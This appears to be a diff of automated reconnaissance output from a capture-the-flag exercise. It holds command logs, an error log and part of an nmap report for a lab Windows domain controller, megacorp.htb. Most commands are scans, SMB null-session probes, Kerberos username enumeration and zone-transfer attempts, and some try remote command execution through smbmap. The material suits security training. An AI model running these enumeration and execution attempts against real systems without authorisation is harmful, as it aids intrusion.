"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49667 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49673 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/tcp_49673_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/xml/tcp_49673_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 megacorp.htb + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +gobuster dns -d megacorp.htb -r 10.129.243.131 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt" + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +curl -sk -o /dev/null -H "Host: buoTkusKMRHQqExxyMge.megacorp.htb" http://megacorp.htb:80/ -w "%{size_download}" + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49667 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131 + +ffuf -u http://megacorp.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.megacorp.htb" -fs 1034 -noninteractive -s | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt" + +dig AXFR -p 53 @10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 megacorp.htb + +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 + +gobuster dns -d megacorp.htb -r 10.129.243.131 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt" + +nmap -vv --reason -Pn -T4 -sU -sV -p 88 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log new file mode 100644 index 00000000..604c1bc4 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log @@ -0,0 +1,56 @@ +[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9). +[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9). +[-] Command: dig AXFR -p 53 @10.129.243.131 +[-] Error Output: + + +[*] Service scan wkhtmltoimage (tcp/80/http/wkhtmltoimage) ran a command which returned a non-zero exit code (1). +[-] Command: wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png +[-] Error Output: +QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root' +Loading page (1/2) +[> ] 0% [==============================> ] 50% [==============================> ] 50% Warning: Failed to load https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css (ignore) +Error: Failed to load https://fonts.googleapis.com/css?family=Open+Sans%7CMaven+Pro:500, with network status code 3 and http status code 0 - Host fonts.googleapis.com not found +Error: Failed to load https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js, with network status code 3 and http status code 0 - Host cdnjs.cloudflare.com not found +libva info: VA-API version 1.17.0 +libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so +libva info: Found init function __vaDriverInit_1_17 +libva error: /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so init failed +libva info: va_openDriver() returns 1 +libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so +libva info: Found init function __vaDriverInit_1_8 +libva info: va_openDriver() returns 0 +[============================================================] 100% Rendering (2/2) +[> ] 0% [===============> ] 25% [============================================================] 100% Done +Exit with code 1 due to network error: HostNotFoundError + + +[*] Service scan SMBClient (tcp/139/netbios-ssn/smbclient) ran a command which returned a non-zero exit code (1). +[-] Command: smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 +[-] Error Output: + + +[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9). +[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9). +[-] Command: dig AXFR -p 53 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DnsRecon Default Scan (tcp/53/domain/dnsrecon) ran a command which returned a non-zero exit code (1). +[-] Command: dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1 +[-] Error Output: + + +[*] Service scan DnsRecon Default Scan (udp/53/domain/dnsrecon) ran a command which returned a non-zero exit code (1). +[-] Command: dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1 +[-] Error Output: + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt new file mode 100644 index 00000000..0ed1f7b8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt @@ -0,0 +1,77 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.041s latency). +Scanned at 2023-10-28 14:23:47 CEST for 245s +Not shown: 65517 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain syn-ack ttl 127 Simple DNS Plus +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-server-header: Microsoft-IIS/10.0 +|_http-title: Slandovia Energy +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:26:10Z) +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-title: Not Found +|_http-server-header: Microsoft-HTTPAPI/2.0 +9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing +49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +49674/tcp open ncacn_http syn-ack ttl 127 